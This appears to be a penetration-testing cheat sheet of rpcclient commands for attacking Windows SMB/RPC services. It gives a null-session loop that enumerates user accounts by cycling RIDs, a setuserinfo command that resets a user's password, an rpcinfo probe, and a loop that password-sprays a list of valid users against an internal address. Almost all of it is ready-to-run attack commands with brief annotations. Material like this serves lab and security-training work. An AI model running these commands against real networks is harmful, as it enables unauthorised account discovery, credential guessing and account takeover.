Enumerate users: rpcclient -N -U "" $IP -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";
- No pass and no user
Change users password: setuserinfo $username 23 '$password'
- “23” refers to level of user information being modifying, and 23 is for passwords. It doesn’t change, unless you’re trying to modify something else.
rpcinfo $IP
Passwordspray:
for u in $(cat valid_users.txt);do rpcclient -U "$u%$password" -c "getusername;quit" 172.16.5.5 | grep Authority; done